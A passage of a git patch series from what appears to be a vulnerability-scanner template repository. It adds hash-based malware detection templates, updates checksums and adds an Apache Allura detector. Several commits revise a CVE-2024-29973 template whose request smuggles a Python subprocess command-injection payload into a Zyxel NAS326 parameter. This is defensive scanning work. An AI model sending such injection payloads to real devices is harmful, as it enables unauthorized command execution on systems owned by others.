'9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78'" + - "sha256(raw) == 'a0db8f8f13a27df1eacbc01505f311f6b14cf9b84fbc7e84cb764a13f001dbbb'" + - "sha256(raw) == 'a241b6611afba8bb1de69044115483adb74f66ab4a80f7423e13c652422cb379'" + - "sha256(raw) == '17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/avburner-malware.yaml b/file/malware/hash/avburner-malware.yaml new file mode 100644 index 0000000000..6940444fbb --- /dev/null +++ b/file/malware/hash/avburner-malware.yaml @@ -0,0 +1,18 @@ +id: avburner-malware +info: + name: AVBurner Malware - Detect + author: pussycat0x + severity: info + description: Detects AVBurner based on a combination of API calls used, hard-coded strings, and bytecode patterns + reference: + - https://github.com/volexity/threat-intel/blob/main/2023/2023-03-07%20AVBurner/yara.yar + tags: malware,snakecharmer + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '4b1b1a1293ccd2c0fd51075de9376ebb55ab64972da785153fcb0a4eb523a5eb'" \ No newline at end of file diff --git a/file/malware/hash/backwash-malware.yaml b/file/malware/hash/backwash-malware.yaml new file mode 100644 index 0000000000..2ab1e9ef56 --- /dev/null +++ b/file/malware/hash/backwash-malware.yaml @@ -0,0 +1,27 @@ +id: backwash-malware +info: + name: Backwash Malware - Detect + author: pussycat0x + severity: info + description: CPP loader for the Backwash malware. + reference: + - https://github.com/volexity/threat-intel/blob/main/2021/2021-12-06%20-%20XEGroup/indicators/yara.yar + - https://blog.malwarebytes.com/threat-analysis/2020/07/credit-card-skimmer-targets-asp-net-sites/ + tags: malware,xegroup + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '0cf93de64aa4dba6cec99aa5989fc9c5049bc46ca5f3cb327b49d62f3646a852'" + - "sha256(raw) == '21683e02e11c166d0cf616ff9a1a4405598db7f4adfc87b205082ae94f83c742'" + - "sha256(raw) == '6f44a9c13459533a1f3e0b0e698820611a18113c851f763797090b8be64fd9d5'" + - "sha256(raw) == '92f9593cfa0a28951cae36755d54de63631377f1b954a4cb0474fa0b6193c537'" + - "sha256(raw) == '815d262d38a26d5695606d03d5a1a49b9c00915ead1d8a2c04eb47846100e93f'" + - "sha256(raw) == '72f7d4d3b9d2e406fa781176bd93e8deee0fb1598b67587e1928455b66b73911'" + - "sha256(raw) == '4d913ecb91bf32fd828d2153342f5462ae6b84c1a5f256107efc88747f7ba16c'" + - "sha256(raw) == '98e39573a3d355d7fdf3439d9418fdbf4e42c2e03051b5313d5c84f3df485627'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/bluelight-malware.yaml b/file/malware/hash/bluelight-malware.yaml new file mode 100644 index 0000000000..4f332d37ab --- /dev/null +++ b/file/malware/hash/bluelight-malware.yaml @@ -0,0 +1,21 @@ +id: bluelight-malware +info: + name: bluelight Malware - Detect + author: pussycat0x + severity: info + description: North Korean origin malware which uses a custom Google App for C2 communications. + reference: + - https://github.com/volexity/threat-intel/blob/main/2021/2021-08-17%20-%20InkySquid%20Part%201/indicators/yara.yar + tags: malware,inkysquid + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed'" + - "sha256(raw) == '7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d'" + - "sha256(raw) == '94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/charmingcypress-malware.yaml b/file/malware/hash/charmingcypress-malware.yaml new file mode 100644 index 0000000000..8bf7abed98 --- /dev/null +++ b/file/malware/hash/charmingcypress-malware.yaml @@ -0,0 +1,17 @@ +id: charmingcypress-malware +info: + name: CharmingCypress Malware - Detect + author: pussycat0x + severity: info + reference: + - https://github.com/volexity/threat-intel/blob/main/2024/2024-02-13%20CharmingCypress/rules.yar + tags: malware + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'fdc5d6caaaa4fb14e62bd42544e8bb8e9b02220e687d5936a6838a7115334c51'" \ No newline at end of file diff --git a/file/malware/hash/disgomoji-malware.yaml b/file/malware/hash/disgomoji-malware.yaml new file mode 100644 index 0000000000..422d33e3e0 --- /dev/null +++ b/file/malware/hash/disgomoji-malware.yaml @@ -0,0 +1,18 @@ +id: disgomoji-malware +info: + name: DISGOMOJI Malware - Detect + author: pussycat0x + severity: info + description: Detects DISGOMOJI modules based on strings in the ELF. + reference: + - https://github.com/volexity/threat-intel/blob/main/2024/2024-06-13%20DISGOMOJI/indicators/rules.yar + tags: malware + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '2abaae4f6794131108adf5b42e09ee5ce24769431a0e154feabe6052cfe70bf3'" \ No newline at end of file diff --git a/file/malware/hash/evilbamboo-malware.yaml b/file/malware/hash/evilbamboo-malware.yaml new file mode 100644 index 0000000000..8d833598eb --- /dev/null +++ b/file/malware/hash/evilbamboo-malware.yaml @@ -0,0 +1,36 @@ +id: evilbamboo-malware +info: + name: EvilBamboo Malware - Detect + author: pussycat0x + severity: info + description: | + Detection of the BADSOLAR and BADBAZAAR data collection files, which are shared by both malware families. + reference: + - https://github.com/volexity/threat-intel/blob/main/2023/2023-09-22%20EvilBamboo/indicators/rules.yar + - https://www.lookout.com/blog/uyghur-surveillance-campaign-badbazaar-moonshine + tags: malware,evilbamboo + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '8448f5cf984e9871966893f0604d9b6d70672c38ff1138a03377848b85a5fcaf'" + - "sha256(raw) == 'bf5f7fbf42236e89bcf663d2822d54bee89abaf3f247a54f371bf156e0e03629'" + - "sha256(raw) == '8448f5cf984e9871966893f0604d9b6d70672c38ff1138a03377848b85a5fcaf'" + - "sha256(raw) == 'f7132750db2a8ca8eb9e9e5a32377aa506395d02bacbb918f835041f5f035c4c'" + - "sha256(raw) == 'daf3d2cb6f1bbb7c8d1cfb5fc0db23afc304a622ebb24aa940228be691bcda2b'" + - "sha256(raw) == '549d726fe2b775cfdd1304c2d689dfd779731336a3143225dc3c095440f69ed0'" + - "sha256(raw) == '0fea799ce00c7d6f26ccb52a2ecbe6b9605cfb9910f2a309a841caedf3b102d7'" + - "sha256(raw) == 'f0bf154d1e90491199b66ab95c1a4071669f3322c55f3643e36c20a9fb63eb56'" + - "sha256(raw) == '549d726fe2b775cfdd1304c2d689dfd779731336a3143225dc3c095440f69ed0'" + - "sha256(raw) == '6aefc2b33e23f6e3c96de51d07f7123bd23ff951d67849a9bd32d446e76fb405'" + - "sha256(raw) == 'bf5f7fbf42236e89bcf663d2822d54bee89abaf3f247a54f371bf156e0e03629'" + - "sha256(raw) == 'fa9154eaa3df4ff4464b21c45362fd1c7fb5e68108ab350c05f2ca9f60263988'" + - "sha256(raw) == 'c5e8476fc6938a36438a433b48e80213e2251b1d4b20a9469912d628a86198b3'" + - "sha256(raw) == '28560642fe99b3e611510f5559a12eb41112f3e2b3005432f7343cb79ff47a34'" + - "sha256(raw) == '7995c382263f8dbbfc37a9d62392aef8b4f89357d436b3dd94dea842f9574ecf'" + - "sha256(raw) == 'efea95720853e0cd2d9d4e93a64a726cfe17efea7b17af7c4ae6d3a6acae5b30'" + condition: or diff --git a/file/malware/hash/flipflop-malware.yaml b/file/malware/hash/flipflop-malware.yaml new file mode 100644 index 0000000000..a59d2b88a0 --- /dev/null +++ b/file/malware/hash/flipflop-malware.yaml @@ -0,0 +1,21 @@ +id: flipflop-ldr-malware +info: + name: Flipflop Loader - Detect + author: pussycat0x + severity: info + description: A loader for the CobaltStrike malware family, which ultimately takes the first and second bytes of an embedded file, and flips them prior to executing the resulting payload. + reference: + - https://github.com/volexity/threat-intel/blob/main/2021/2021-05-27%20-%20Suspected%20APT29%20Operation%20Launches%20Election%20Fraud%20Themed%20Phishing%20Campaigns/indicators/yara.yar + tags: malware,apt29,cobaltstrike + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'ee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330'" + - "sha256(raw) == 'b041efb8ba2a88a3d172f480efa098d72eef13e42af6aa5fb838e6ccab500a7c'" + - "sha256(raw) == 'ad67aaa50fd60d02f1378b4155f69cffa9591eaeb80523489a2355512cc30e8c'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/gimmick-malware.yaml b/file/malware/hash/gimmick-malware.yaml new file mode 100644 index 0000000000..2a4065fec8 --- /dev/null +++ b/file/malware/hash/gimmick-malware.yaml @@ -0,0 +1,18 @@ +id: gimmick-malware +info: + name: GIMMICK Malware - Detect + author: pussycat0x + severity: info + description: Detects the macOS port of the GIMMICK malware. + reference: + - https://github.com/volexity/threat-intel/blob/main/2022/2022-03-22%20GIMMICK/indicators/yara.yar + tags: malware,stormcloud + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '2a9296ac999e78f6c0bee8aca8bfa4d4638aa30d9c8ccc65124b1cbfc9caab5f'" \ No newline at end of file diff --git a/file/malware/hash/godzilla-webshell.yaml b/file/malware/hash/godzilla-webshell.yaml new file mode 100644 index 0000000000..3866d10a8c --- /dev/null +++ b/file/malware/hash/godzilla-webshell.yaml @@ -0,0 +1,19 @@ +id: godzilla-webshell +info: + name: Godzilla Webshell - Detect + author: pussycat0x + severity: info + description: Detects the JSP implementation of the Godzilla Webshell. + reference: + - https://github.com/volexity/threat-intel/blob/main/2022/2022-08-10%20Mass%20exploitation%20of%20(Un)authenticated%20Zimbra%20RCE%20CVE-2022-27925/yara.yar + - https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ + tags: malware,webshells + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '2786d2dc738529a34ecde10ffeda69b7f40762bf13e7771451f13a24ab7fc5fe'" \ No newline at end of file diff --git a/file/malware/hash/ico-malware.yaml b/file/malware/hash/ico-malware.yaml new file mode 100644 index 0000000000..0e9dfa61f4 --- /dev/null +++ b/file/malware/hash/ico-malware.yaml @@ -0,0 +1,26 @@ +id: ico-malware +info: + name: ICO Malware - Detect + author: pussycat0x + severity: info + description: Detection of malicious ICO files used in 3CX compromise + reference: + - https://github.com/volexity/threat-intel/blob/main/2023/2023-03-30%203CX/indicators/rules.yar + tags: malware,UTA0040 + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'a541e5fc421c358e0a2b07bf4771e897fb5a617998aa4876e0e1baa5fbb8e25c'" + - "sha256(raw) == 'a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67'" + - "sha256(raw) == '8ab3a5eaaf8c296080fadf56b265194681d7da5da7c02562953a4cb60e147423'" + - "sha256(raw) == 'f79c3b0adb6ec7bcc8bc9ae955a1571aaed6755a28c8b17b1d7595ee86840952'" + - "sha256(raw) == '7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896'" + - "sha256(raw) == 'aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868'" + condition: or + + diff --git a/file/malware/hash/powerstar-malware.yaml b/file/malware/hash/powerstar-malware.yaml new file mode 100644 index 0000000000..8efae04aec --- /dev/null +++ b/file/malware/hash/powerstar-malware.yaml @@ -0,0 +1,22 @@ +id: powerstar-malware +info: + name: PowerStar Malware - Detect + author: pussycat0x + severity: info + description: Detects the batch script used to persist PowerStar via Startup. + reference: + - https://github.com/volexity/threat-intel/blob/main/2023/2023-06-28%20POWERSTAR/indicators/rules.yar + tags: malware,charmingkitten + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '9777f106ac62829cd3cfdbc156100fe892cfc4038f4c29a076e623dc40a60872'" + - "sha256(raw) == '977cf5cc1d0c61b7364edcf397e5c67d910fac628c6c9a41cf9c73b3720ce67f'" + - "sha256(raw) == 'b79d28fe5e3c988bb5aadb12ce442d53291dbb9ede0c7d9d64eec078beba5585'" + - "sha256(raw) == 'de99c4fa14d99af791826a170b57a70b8265fee61c6b6278d3fe0aad98e85460'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/regeorg-webshell.yaml b/file/malware/hash/regeorg-webshell.yaml new file mode 100644 index 0000000000..f4520f0c64 --- /dev/null +++ b/file/malware/hash/regeorg-webshell.yaml @@ -0,0 +1,19 @@ +id: regeorg-webshel +info: + name: ReGeorg Webshell - Detect + author: pussycat0x + severity: info + description: Detects the reGeorg webshells' JSP version. + reference: + - https://github.com/volexity/threat-intel/blob/main/2022/2022-08-10%20Mass%20exploitation%20of%20(Un)authenticated%20Zimbra%20RCE%20CVE-2022-27925/yara.yar + - https://github.com/SecWiki/WebShell-2/blob/master/reGeorg-master/tunnel.jsp + tags: malware,webshells + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'f9b20324f4239a8c82042d8207e35776d6777b6305974964cd9ccc09d431b845'" diff --git a/file/malware/hash/rokrat-malware.yaml b/file/malware/hash/rokrat-malware.yaml new file mode 100644 index 0000000000..0f5cd8f94e --- /dev/null +++ b/file/malware/hash/rokrat-malware.yaml @@ -0,0 +1,22 @@ +id: rokrat-malware +info: + name: Rokrat Malware - Detect + author: pussycat0x + severity: info + description: Ruby loader seen loading the ROKRAT malware family. + reference: + - https://github.com/volexity/threat-intel/blob/main/2021/2021-08-24%20-%20InkySquid%20Part%202/indicators/yara.yar + tags: malware,inkysquid + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '5bc52f6c1c0d0131cee30b4f192ce738ad70bcb56e84180f464a5125d1a784b2'" + - "sha256(raw) == '80269413be6ad51b8b19631b2f5559c9572842e789bbce031babe6e879d2e120'" + - "sha256(raw) == '6a452d088d60113f623b852f33f8f9acf0d4197af29781f889613fed38f57855'" + - "sha256(raw) == '85cd5c3bb028fe6931130ccd5d0b0c535c01ce2bcda660a3b72581a1a5382904'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/sharpext-malware.yaml b/file/malware/hash/sharpext-malware.yaml new file mode 100644 index 0000000000..c87c46c689 --- /dev/null +++ b/file/malware/hash/sharpext-malware.yaml @@ -0,0 +1,21 @@ +id: sharpext-malware +info: + name: Sharpext Malware - Detect + author: pussycat0x + severity: info + description: A malicious Chrome browser extension used by the SharpTongue threat actor to steal mail data from a victim. + reference: + - https://github.com/volexity/threat-intel/blob/main/2022/2022-07-28%20SharpTongue%20SharpTongue%20Deploys%20Clever%20Mail-Stealing%20Browser%20Extension%20SHARPEXT/yara.yar + tags: malware,sharptongue + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '1c9664513fe226beb53268b58b11dacc35b80a12c50c22b76382304badf4eb00'" + - "sha256(raw) == '6025c66c2eaae30c0349731beb8a95f8a5ba1180c5481e9a49d474f4e1bb76a4'" + - "sha256(raw) == '6594b75939bcdab4253172f0fa9066c8aee2fa4911bd5a03421aeb7edcd9c90c'" + condition: or \ No newline at end of file From d1382959ec4c760f06095e7aa183432dc9a3b7ce Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 19 Jun 2024 11:06:33 +0000 Subject: [PATCH 0413/1841] Auto Generated Templates Checksum [Wed Jun 19 11:06:33 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 55f76e9a7a..d9858e1ab0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -222,7 +222,7 @@ dns/dns-rebinding.yaml:45774e6d0aabacb2fcf032dc41deb3073c8abba6 dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e dns/dns-waf-detect.yaml:305812728bc0395016f22f5b4c04f634a9fb4ad4 dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592 -dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644 +dns/ec2-detection.yaml:a036090fde3e68ef76c34a6c049bc4dc442ba53d dns/elasticbeanstalk-takeover.yaml:d6be1fd0a3ee4d72149e942bcf77b93c175c1588 dns/mx-fingerprint.yaml:fbf27fe4996aa0b33aa0b6ea7077de40078fbb66 dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58 @@ -3300,7 +3300,7 @@ http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 http/cves/2024/CVE-2024-24112.yaml:02f1d93189f81a45341e7a2c2bff5f935df70204 http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c -http/cves/2024/CVE-2024-24565.yaml:d76d87331d853587d4dd5432f06bc4f755135c3c +http/cves/2024/CVE-2024-24565.yaml:3ce11e2d0ce96ee70c97b3442e730fdcc23b2bb6 http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 @@ -3322,7 +3322,7 @@ http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 -http/cves/2024/CVE-2024-29824.yaml:96a8d8932091744ec703b3ce38b39145606f0b95 +http/cves/2024/CVE-2024-29824.yaml:536cf11756418d5648a093c543b58ed024e0d9fc http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae @@ -8679,7 +8679,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b8d5d0f3596192ef98b77f142f2f6bccf41711fd +templates-checksum.txt:5e1822555f60e1aab4e7f15cc87b56897cf317a0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 870aab98cdd494b8952f9b6634a62c75e6f804a2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 19 Jun 2024 11:08:13 +0000 Subject: [PATCH 0414/1841] Auto Template Signing [Wed Jun 19 11:08:13 UTC 2024] :robot: --- dns/ec2-detection.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/dns/ec2-detection.yaml b/dns/ec2-detection.yaml index c43aa37c25..1d8b7e823c 100644 --- a/dns/ec2-detection.yaml +++ b/dns/ec2-detection.yaml @@ -23,5 +23,4 @@ dns: regex: - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" - -# digest: 4a0a00473045022100995379438eef7d1b9435317e2326c27b32ff7c257437185c9bf505dc30d972e002202882175b25ec22258156a75b31ed020bfcdc29ababcd9e052ce591ab2acb3ff8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201c3fc8b811bd7ad8ae91400c81046f0535ffbd09c16ee81c1bfab12b6f8dec830220359bfdcef980f58598baa3e0928dcedf112617c450d10f8ea6f7e520f5a9fdfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ab764a0ace02485b60bf57157fecab5f002e03ca Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 19 Jun 2024 16:42:01 +0530 Subject: [PATCH 0415/1841] updated matchers --- http/cves/2024/CVE-2024-29973.yaml | 18 ++++++++---------- 1 file changed, 8 insertions(+), 10 deletions(-) diff --git a/http/cves/2024/CVE-2024-29973.yaml b/http/cves/2024/CVE-2024-29973.yaml index ecbdee44a7..e8cc240bc7 100644 --- a/http/cves/2024/CVE-2024-29973.yaml +++ b/http/cves/2024/CVE-2024-29973.yaml @@ -27,16 +27,14 @@ info: http: - raw: - | - GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+and+False+or+_import_("subprocess").check_output("id",+shell=True)%23 HTTP/1.1 + GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - - type: regex - part: body - regex: - - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' - - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code == 200" + - "contains(body, 'errmsg0\": \"OK')" + - "contains(header, 'application/json')" + - regex('uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)', body) + condition: and From c8a8e0986f49212e0a3760647b2b1e905d04b7cd Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Wed, 19 Jun 2024 09:19:40 -0300 Subject: [PATCH 0416/1841] Create apache-allura-detect.yaml Detects a Apache Allura server, a open source implementation of a software "forge". Reference: https://allura.apache.org/ --- http/technologies/apache-allura-detect.yaml | 35 +++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/technologies/apache-allura-detect.yaml diff --git a/http/technologies/apache-allura-detect.yaml b/http/technologies/apache-allura-detect.yaml new file mode 100644 index 0000000000..1424e364e1 --- /dev/null +++ b/http/technologies/apache-allura-detect.yaml @@ -0,0 +1,35 @@ +id: apache-allura-detect + +info: + name: Apache Allura Detection + author: icarot + severity: info + description: | + Detects a Apache Allura server, a open source implementation of a software "forge". + reference: + - https://allura.apache.org/ + classification: + cpe: cpe:2.3:a:apache:allura:*:*:*:*:*:*:*:* + + metadata: + max-request: 1 + vendor: apache + product: allura + tags: tech,allura,apache,detect + +http: + - method: GET + path: + - "{{BaseURL}}/neighborhood" + + matchers-condition: and + matchers: + - type: word + words: + - '<title>All Neighborhoods' + - '>Apache Allura' + condition: and + + - type: status + status: + - 200 From 115e416027146631ed14031e858907f9cdca73fb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 19 Jun 2024 18:41:25 +0530 Subject: [PATCH 0417/1841] verified poc --- http/cves/2024/CVE-2024-29973.yaml | 19 +++++++++++++++---- 1 file changed, 15 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-29973.yaml b/http/cves/2024/CVE-2024-29973.yaml index e8cc240bc7..94e18cbc27 100644 --- a/http/cves/2024/CVE-2024-29973.yaml +++ b/http/cves/2024/CVE-2024-29973.yaml @@ -1,7 +1,7 @@ id: CVE-2024-29973 info: - name: Zyxel NAS326 firmware < V5.21(AAZF.17)C0 - Command Injection + name: Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection author: ritikchaddha severity: critical description: | @@ -19,16 +19,27 @@ info: epss-percentile: 0.9971 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 vendor: zyxel product: nas326_firmware - tags: cve,cve2024,zyxel,rce + fofa-query: app="ZYXEL-NAS326" + tags: cve,cve2024,zyxel,rce,intrusive +variables: + string: "{{randstr}}" http: - raw: - | - GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1 + POST /cmd,/simZysh/register_main/setCookie HTTP/1.1 Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei + + ------WebKitFormBoundarygcflwtei + Content-Disposition: form-data; name="c0" + + storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("echo {{string}}", shell=True)# + ------WebKitFormBoundarygcflwtei-- matchers: - type: dsl @@ -36,5 +47,5 @@ http: - "status_code == 200" - "contains(body, 'errmsg0\": \"OK')" - "contains(header, 'application/json')" - - regex('uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)', body) + - "contains(body, '{{string}}')" condition: and From 2b4833162f46b0d09e696526d117d65c5baac9bd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 19 Jun 2024 13:28:51 +0000 Subject: [PATCH 0418/1841] Auto Generated New Template Addition List [Wed Jun 19 13:28:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9444781207..7f27694f04 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/cves/2024/CVE-2024-2621.yaml http/cves/2024/CVE-2024-27718.yaml http/cves/2024/CVE-2024-28995.yaml http/cves/2024/CVE-2024-29824.yaml +http/cves/2024/CVE-2024-29973.yaml http/cves/2024/CVE-2024-31750.yaml http/cves/2024/CVE-2024-31982.yaml http/cves/2024/CVE-2024-32113.yaml From 572a460383711caa658b36455868d8141163817b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 19 Jun 2024 13:29:01 +0000 Subject: [PATCH 0419/1841] Auto Generated Templates Checksum [Wed Jun 19 13:29:01 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d9858e1ab0..e58b26fb0d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -222,7 +222,7 @@ dns/dns-rebinding.yaml:45774e6d0aabacb2fcf032dc41deb3073c8abba6 dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e dns/dns-waf-detect.yaml:305812728bc0395016f22f5b4c04f634a9fb4ad4 dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592 -dns/ec2-detection.yaml:a036090fde3e68ef76c34a6c049bc4dc442ba53d +dns/ec2-detection.yaml:544cf70af17ae7387f072f7d0d6bfcd65530c286 dns/elasticbeanstalk-takeover.yaml:d6be1fd0a3ee4d72149e942bcf77b93c175c1588 dns/mx-fingerprint.yaml:fbf27fe4996aa0b33aa0b6ea7077de40078fbb66 dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58 @@ -3323,6 +3323,7 @@ http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-29824.yaml:536cf11756418d5648a093c543b58ed024e0d9fc +http/cves/2024/CVE-2024-29973.yaml:0a67d8067627c00bf65012d9dcdf9ac98eb46cc3 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae @@ -8679,7 +8680,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5e1822555f60e1aab4e7f15cc87b56897cf317a0 +templates-checksum.txt:efa1688884af3004ef5e68f267c5356c16aaea24 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fb9d484ef09042e0aa79beb1db81cf9cb6b74185 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 19 Jun 2024 13:30:11 +0000 Subject: [PATCH 0420/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index adfa06c7da..54bdccada6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -28,6 +28,7 @@ on: - 'http/cves/2024/CVE-2024-27718.yaml' - 'http/cves/2024/CVE-2024-28995.yaml' - 'http/cves/2024/CVE-2024-29824.yaml' + - 'http/cves/2024/CVE-2024-29973.yaml' - 'http/cves/2024/CVE-2024-31750.yaml' - 'http/cves/2024/CVE-2024-31982.yaml' - 'http/cves/2024/CVE-2024-32113.yaml' From 2eb8e6666db178d84803bf16ab87d42cc65da0f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 19 Jun 